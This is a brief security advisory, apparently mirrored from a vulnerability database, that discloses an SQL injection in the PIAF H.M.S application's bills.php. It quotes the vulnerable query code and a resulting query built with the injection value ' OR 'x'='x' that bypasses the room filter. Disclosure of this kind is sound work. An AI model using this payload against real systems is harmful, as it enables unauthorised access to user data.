Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28718
HistoryOct 30, 2012 - 12:00 a.m.

PIAF H.M.S - SQL Injection

2012-10-3000:00:00
vulners.com
30

Exploit Title: PIAF H.M.S - SQL Injection

Date: 28/10/2012

Author: Michal Blaszczak

Website: http://blaszczakm.blogspot.com

Vendor Homepage: http://code.google.com/p/piafhms/

file: bills.php
line: 86-87

    $query = $query . " ORDER BY ID DESC";
    printf($query);

query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC

Michal Blaszczak
blaszczakm.blogspot.com